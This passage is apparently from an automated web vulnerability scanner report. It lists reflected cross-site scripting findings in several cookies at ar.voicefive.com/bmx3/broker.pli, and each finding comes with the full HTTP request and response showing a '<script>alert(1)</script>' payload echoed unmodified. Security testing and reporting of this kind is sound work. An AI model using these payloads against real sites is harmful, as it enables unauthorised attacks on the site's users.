Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=180574<script>alert(1)</script>047c0d9a986; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:52 2011&recExp=Thu May 5 00:58:52 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27200

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '180574<script>alert(1)</script>047c0d9a986', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

5.221. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload f3e1c<script>alert(1)</script>9b64d9a99cd was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2Cf3e1c<script>alert(1)</script>9b64d9a99cd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:58:52 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90452457=exp=1&initExp=Thu May 5 00:58:52 2011&recExp=Thu May 5 00:58:52 2011&prad=310177527&arc=211671722&; expires=Wed 03-Aug-2011 00:58:52 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27200

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"310177527",Pid:"p90452457",Arc:"211671722",Location:
...[SNIP]...
060&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2Cf3e1c<script>alert(1)</script>9b64d9a99cd', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.222. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 61ce0<script>alert(1)</script>9a7f3357ce4 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-130334904661ce0<script>alert(1)</script>9a7f3357ce4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
;
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-130334904661ce0<script>alert(1)</script>9a7f3357ce4', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p97174789": 'exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 1
...[SNIP]...

5.223. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a61c2<script>alert(1)</script>8ddd6783f06 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a61c2<script>alert(1)</script>8ddd6783f06; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a61c2<script>alert(1)</script>8ddd6783f06', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

5.224. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 50744<script>alert(1)</script>dc76054891d was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&50744<script>alert(1)</script>dc76054891d; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&50744<script>alert(1)</script>dc76054891d', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.225. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 7f012<script>alert(1)</script>9fa647b77a8 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&7f012<script>alert(1)</script>9fa647b77a8; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "ar_s_p81479006": '1', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&7f012<script>alert(1)</script>9fa647b77a8', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&ini
...[SNIP]...

5.226. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload 5ebca<script>alert(1)</script>e6b432fdeff was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735228&AR_C=178115060 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5ebca<script>alert(1)</script>e6b432fdeff; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=33&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 2 19:56:32 2011&prad=253732017&arc=206438309&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:59 2011&prad=253735228&arc=178115060&; expires=Wed 03-Aug-2011 00:56:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304557019; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735228",Pid:"p97174789",Arc:"178115060",Location:
...[SNIP]...
27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5ebca<script>alert(1)</script>e6b432fdeff', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p92429851": 'exp=4&initExp=
...[SNIP]...

5.227. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90452457 cookie is copied into the HTML document as plain text between tags. The payload bcd1d<script>alert(1)</script>3f482f6797c was submitted in the ar_p90452457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735225&AR_C=206438317 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://realestate.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
